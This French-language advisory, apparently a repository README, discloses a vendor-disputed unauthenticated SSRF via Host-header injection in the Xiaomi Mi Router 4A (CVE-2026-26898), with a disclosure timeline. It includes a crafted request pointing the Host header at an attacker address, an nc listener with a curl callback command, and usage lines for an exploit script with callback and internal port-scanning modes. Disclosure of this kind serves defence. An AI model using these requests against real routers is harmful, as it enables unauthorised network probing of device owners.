
SSRF non authentifié dans Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) via l'injection d'en-tête Host — CVE-2026-26898
Une vulnérabilité de Server-Side Request Forgery (SSRF) existe dans le Xiaomi Mi Router 4A Gigabit Edition. L'interface web du routeur ne valide pas l'en-tête HTTP Host, permettant à un attaquant non authentifié de forcer le routeur à effectuer des connexions TCP sortantes arbitraires.
| Champ | Valeur |
|---|---|
| Appareil | Xiaomi Mi Router 4A Gigabit Edition |
| Micrologiciel | 3.0.24 (International) |
| CVE | CVE-2026-26898 (contesté — voir Statut de divulgation ci-dessous) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (Élevé) — évalué par le chercheur ; le fournisseur conteste la gravité |
Statut : Contesté par le fournisseur — ce rapport n'a pas été accepté par Xiaomi.
CVE-2026-26898 est utilisé ici uniquement pour le suivi ; étant donné le litige avec le fournisseur, il doit être considéré comme contesté / non confirmé, et non comme confirmé par le fournisseur.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| Fichier | Description |
|---|---|
xiaomi_ssrf_exploit.py | Exploit complet avec plusieurs modes |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| Date | Événement |
|---|---|
| 2026-01-15 | Vulnérabilité découverte ; PoC développé |
| 2026-01-16 | Signalé à Xiaomi via HackerOne (#3513458) |
| 2026-01-23 | Xiaomi a fermé le rapport comme (faible risque, ne corrigera pas) |
Cet exploit est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace
| 2026-06-03 | Avis public publié (ce dépôt) — contesté par le fournisseur, non corrigé |